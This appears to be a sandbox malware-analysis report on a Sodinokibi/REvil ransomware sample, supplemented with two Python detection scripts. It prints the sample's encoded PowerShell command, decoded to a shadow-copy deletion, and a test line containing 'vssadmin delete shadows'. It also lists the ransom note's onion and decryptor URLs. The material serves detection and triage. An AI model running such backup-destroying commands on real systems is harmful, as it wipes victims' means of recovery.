Analysis
- max time kernel: 143s
- max time network: 151s
- platform: windows10-2004_x64
- resource: win10v2004-20231025-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20231025-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 17-11-2023 15:57
Behavioral task behavioral1
- Sample: NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe
- Resource: win7-20231020-en
Behavioral task behavioral2
- Sample: NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe
- Resource: win10v2004-20231025-en
General
- Target: NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe
- Size: 164KB
- MD5: 17d54fde8f0dca439f4c32a02598e382
- SHA1: 5eb54861db41b62e9fa296f703f06b8e52d1941d
- SHA256: 5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c
- SHA512: 09473f8ad9cd0d614d4a6fed4f7c34bba89f4a3e8cd0a350870e716b1f499d0d99f25ea436b13512094bf2f56178d5f9ffa8c74ad125c4c61e6aaba7b2a814b5
- SSDEEP: 3072:ffYWjswg4fQlt4ndm8jX5IXzs+M9VQHDOVFI0kmit3:ffYWAw9fcUdmwIXo+M9VQHDlZmit
Malware Config
Extracted from: C:\Recovery\lksa5g4hnb-readme.txt (the dropped ransom note)
Family: sodinokibi
URLs:
- http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/C02D5C9E3F2A6806
- http://decryptor.top/C02D5C9E3F2A6806
Signatures
-
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives (3 TTPs, 25 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
process: NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe
description: File opened (read-only)
ioc (25 drive roots, every letter except the system drive C:): \??\A: \??\B: \??\D: \??\E: \??\F: \??\G: \??\H: \??\I: \??\J: \??\K: \??\L: \??\M: \??\N: \??\O: \??\P: \??\Q: \??\R: \??\S: \??\T: \??\U: \??\V: \??\W: \??\X: \??\Y: \??\Z:
-
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes:
process: NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe
description: Set value (str)
ioc: \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7b35.bmp"
-
Drops file in Program Files directory (13 IoCs)
Processes:
process: NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe
File opened for modification (11):
- \??\c:\program files\ExportConnect.potx
- \??\c:\program files\LimitEnter.xml
- \??\c:\program files\RemoveFormat.mpeg
- \??\c:\program files\GetCompare.mp4
- \??\c:\program files\TraceSwitch.xsl
- \??\c:\program files\UnregisterCompress.vb
- \??\c:\program files\InvokeAdd.mp4v
- \??\c:\program files\ConvertFromAssert.vbs
- \??\c:\program files\ExpandRedo.i64
- \??\c:\program files\HideSwitch.potm
- \??\c:\program files\RegisterSave.xsl
File created (2, copies of the ransom note):
- \??\c:\program files\lksa5g4hnb-readme.txt
- \??\c:\program files (x86)\lksa5g4hnb-readme.txt
-
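The two file-activity signatures above (drive-root enumeration and mass modification plus note drops in Program Files) are the kind of behaviour a triage script can score from the report's own IoC lines. The block below is an added example, not part of the sandbox report or any vendor tooling: it parses lines in the "<action> <path> <process image>" form printed above, builds a per-process profile, and applies three heuristics (many non-system drive roots opened, many files opened for modification, one filename created in several directories). The 25 drive-root lines and the Program Files entries are reconstructed from this report; the explorer.exe lines and the thresholds are constructed assumptions.

```python
# Added example (not from the sandbox report): per-process ransomware heuristics
# built from file IoC lines in the report's own "<action> <path> <image>" format.
import re
from collections import defaultdict

SAMPLE = "NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe"

# "<action> <path> <process image>" as printed in the report's IoC tables.
IOC_LINE = re.compile(
    r"^(File opened \(read-only\)|File opened for modification|File created)\s+(.+?)\s+(\S+\.exe)$",
    re.I,
)
# NT-style drive root such as \??\Y:
DRIVE_ROOT = re.compile(r"^\\\?\?\\([A-Za-z]):$")

# Constructed input: the report's 25 drive-root opens and Program Files IoCs,
# plus two benign explorer.exe lines (constructed) that must not be flagged.
REPORT_LINES = [rf"File opened (read-only) \??\{d}: {SAMPLE}" for d in "ABDEFGHIJKLMNOPQRSTUVWXYZ"]
REPORT_LINES += [
    rf"File opened for modification \??\c:\program files\{name} {SAMPLE}"
    for name in ("ExportConnect.potx", "LimitEnter.xml", "RemoveFormat.mpeg", "GetCompare.mp4",
                 "TraceSwitch.xsl", "UnregisterCompress.vb", "InvokeAdd.mp4v", "ConvertFromAssert.vbs",
                 "ExpandRedo.i64", "HideSwitch.potm", "RegisterSave.xsl")
]
REPORT_LINES += [
    rf"File created \??\c:\program files\lksa5g4hnb-readme.txt {SAMPLE}",
    rf"File created \??\c:\program files (x86)\lksa5g4hnb-readme.txt {SAMPLE}",
    r"File opened (read-only) \??\D: explorer.exe",
    r"File opened for modification \??\c:\users\admin\desktop.ini explorer.exe",
]


def profile_file_events(lines, system_drive="C"):
    """Group file IoCs by process image: {image: {"drives": set, "modified": [], "created": []}}."""
    profiles = defaultdict(lambda: {"drives": set(), "modified": [], "created": []})
    for line in lines:
        m = IOC_LINE.match(line.strip())
        if not m:
            continue  # not a file IoC line (the report mixes in registry and token events)
        action, path, image = m.groups()
        entry = profiles[image]
        root = DRIVE_ROOT.match(path)
        if root:
            if root.group(1).upper() != system_drive:
                entry["drives"].add(root.group(1).upper())
        elif action.lower() == "file opened for modification":
            entry["modified"].append(path)
        elif action.lower() == "file created":
            entry["created"].append(path)
    return profiles


def note_like_files(created):
    """Filenames created under two or more distinct directories (the ransom-note drop pattern)."""
    dirs_by_name = defaultdict(set)
    for path in created:
        directory, _, name = path.rpartition("\\")
        dirs_by_name[name.lower()].add(directory.lower())
    return {name for name, dirs in dirs_by_name.items() if len(dirs) >= 2}


def ransomware_indicators(profile, drive_threshold=5, modify_threshold=10):
    """Heuristic hits for one process profile; an empty list means nothing suspicious.
    Thresholds are assumptions chosen for this example, not tuned production values."""
    hits = []
    if len(profile["drives"]) >= drive_threshold:
        hits.append(f"opened {len(profile['drives'])} non-system drive roots")
    if len(profile["modified"]) >= modify_threshold:
        hits.append(f"opened {len(profile['modified'])} files for modification")
    notes = note_like_files(profile["created"])
    if notes:
        hits.append("dropped note-like file in multiple directories: " + ", ".join(sorted(notes)))
    return hits


def triage(lines):
    """Map each process image seen in the IoC lines to its heuristic hits."""
    return {image: ransomware_indicators(p) for image, p in profile_file_events(lines).items()}


if __name__ == "__main__":
    for image, hits in triage(REPORT_LINES).items():
        print(image, "->", hits or "no ransomware indicators")
```

The drive-root heuristic deliberately ignores the system drive: legitimate software touches C: constantly, but almost nothing opens A: through Z: in sequence except enumeration loops like the one this sample runs before encrypting.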
Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes:
- PID 2888 NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe (2 IoCs)
- PID 3720 powershell.exe (3 IoCs)
-
Suspicious use of AdjustPrivilegeToken (4 IoCs)
Processes:
- PID 3720 powershell.exe: Token: SeDebugPrivilege
- PID 3748 vssvc.exe: Token: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
-
Suspicious use of WriteProcessMemory (2 IoCs)
Processes:
- PID 2888 NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe wrote to memory of PID 3720 powershell.exe (2 IoCs)
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots. In this run it is reached through the WMI Win32_ShadowCopy class from the PowerShell child the sample spawns (see the decoded command in the process tree), which is why unsecapp.exe (the WMI asynchronous-callback sink host, started with -Embedding) and vssvc.exe appear. The SeBackupPrivilege/SeRestorePrivilege tokens on vssvc.exe are the service's own normal privileges, not a privilege escalation by the sample; the recovery-relevant event is that the shadow copies get deleted.
Processes
- C:\Users\Admin\AppData\Local\Temp\NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe (PID 2888)
  Command line: "C:\Users\Admin\AppData\Local\Temp\NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe"
  - Enumerates connected drives
  - Sets desktop wallpaper using registry
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  - Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3720)
    Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
    Decoded (-e is -EncodedCommand; the argument is base64 over UTF-16LE): Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\wbem\unsecapp.exe
  Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
- C:\Windows\system32\vssvc.exe (PID 3748)
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
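The encoded PowerShell child is the most detection-relevant line in the tree: the sample hides a shadow-copy deletion behind -EncodedCommand so that a string match on "vssadmin" or "shadowcopy" in the raw command line misses it. The block below is an added example, not part of the sandbox report or any vendor product: it decodes -EncodedCommand payloads from process-creation command lines (base64 over UTF-16LE, which is why the raw argument shows an "A" every other character) and then matches the common shadow-copy deletion techniques against both the raw and decoded text. The PID 3720 command line and PIDs 2888/3720 are taken from this report; the other events, the parent PID 1234 and the event field names are constructed assumptions.

```python
# Added example (not from the sandbox report): decode PowerShell -EncodedCommand
# payloads and flag shadow-copy deletion in process-creation command lines.
import base64
import re

# Command line of PID 3720 as recorded in the report.
REVIL_CMDLINE = (
    "powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAA"
    "RgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=="
)

# Techniques checked; each regex is applied to the raw command line plus any decoded payload.
SHADOW_COPY_PATTERNS = {
    "wmi Win32_ShadowCopy.Delete": re.compile(r"win32_shadowcopy.*\.delete\s*\(", re.I | re.S),
    "vssadmin delete shadows": re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows", re.I),
    "wmic shadowcopy delete": re.compile(r"wmic(?:\.exe)?\s+shadowcopy\s+delete", re.I),
    "vssadmin resize shadowstorage": re.compile(r"vssadmin(?:\.exe)?\s+resize\s+shadowstorage", re.I),
}


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand text, or None if the command line carries none.
    PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)."""
    tokens = cmdline.split()  # assumption: payload is its own whitespace-separated token
    for flag, payload in zip(tokens, tokens[1:]):
        f = flag.lower()
        if not (f.startswith("-e") and "-encodedcommand".startswith(f)):
            continue
        try:
            raw = base64.b64decode(payload.strip("\"'"), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            return None
        if len(raw) % 2:
            return None  # odd byte count cannot be UTF-16LE
        return raw.decode("utf-16-le", errors="replace").rstrip("\x00")
    return None


def shadow_copy_deletion(cmdline):
    """Names of shadow-copy deletion techniques found in the command line or its decoded payload."""
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded:
        text = f"{cmdline}\n{decoded}"
    return [name for name, pat in SHADOW_COPY_PATTERNS.items() if pat.search(text)]


def triage(events):
    """Return (pid, ppid, techniques, decoded payload) for every event that hits."""
    findings = []
    for ev in events:
        hits = shadow_copy_deletion(ev["cmdline"])
        if hits:
            findings.append((ev["pid"], ev["ppid"], hits, decode_encoded_command(ev["cmdline"])))
    return findings


# Constructed process-creation events (field names are an assumption, not a product schema).
EVENTS = [
    {"pid": 2888, "ppid": 1234, "image": "NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\NEAS.5d9b75e2cb84333c6b56604ce47af75b11f80bf9079054f6619251b68357d87c.exe"'},
    {"pid": 3720, "ppid": 2888, "image": "powershell.exe", "cmdline": REVIL_CMDLINE},
    {"pid": 4100, "ppid": 1234, "image": "powershell.exe", "cmdline": 'powershell -NoProfile -Command "Get-Date"'},
    {"pid": 4200, "ppid": 4100, "image": "cmd.exe", "cmdline": "cmd.exe /c vssadmin.exe delete shadows /all /quiet"},
]

if __name__ == "__main__":
    for pid, ppid, hits, decoded in triage(EVENTS):
        print(f"PID {pid} (parent {ppid}): {', '.join(hits)}", f"| decoded: {decoded}" if decoded else "")
```

Matching against the decoded text is what turns the opaque `-e RwBl...` argument into a hit on Win32_ShadowCopy.Delete; a rule that only inspects the raw command line would see an ordinary-looking powershell.exe launch from the sample's process.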
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
-
- C:\Recovery\lksa5g4hnb-readme.txt
  Filesize: 6KB
  MD5: 7d737a22118f9a6fb0dbe83b7b497b10
  SHA1: b4d807d1b957dcb64fe3eb1b89bec62443298277
  SHA256: a09eeb7cd7b5cd5bb9efcc2c5291065b8d84c450d78a703323fa05debfb8d9ec
  SHA512: 7b49b0aceeec969d88eb71e3656ad69d895c8ce9639a0a5828ee54a8871ef42f1a6048fca8aa4d2e1e9965a54083fa9166bd8b3109fd48e70c5110d7cce9acb9
-
- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wsdj2in5.231.ps1 (written by PowerShell itself at startup to test script-execution policy; a PowerShell artifact, not a sample drop)
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
- memory/3720-5-0x0000022B1F8E0000-0x0000022B1F902000-memory.dmp (Filesize: 136KB)
- memory/3720-10-0x00007FFEFBD60000-0x00007FFEFC821000-memory.dmp (Filesize: 10.8MB)
- memory/3720-11-0x0000022B37AD0000-0x0000022B37AE0000-memory.dmp (Filesize: 64KB)
- memory/3720-12-0x0000022B37AD0000-0x0000022B37AE0000-memory.dmp (Filesize: 64KB)
- memory/3720-15-0x00007FFEFBD60000-0x00007FFEFC821000-memory.dmp (Filesize: 10.8MB)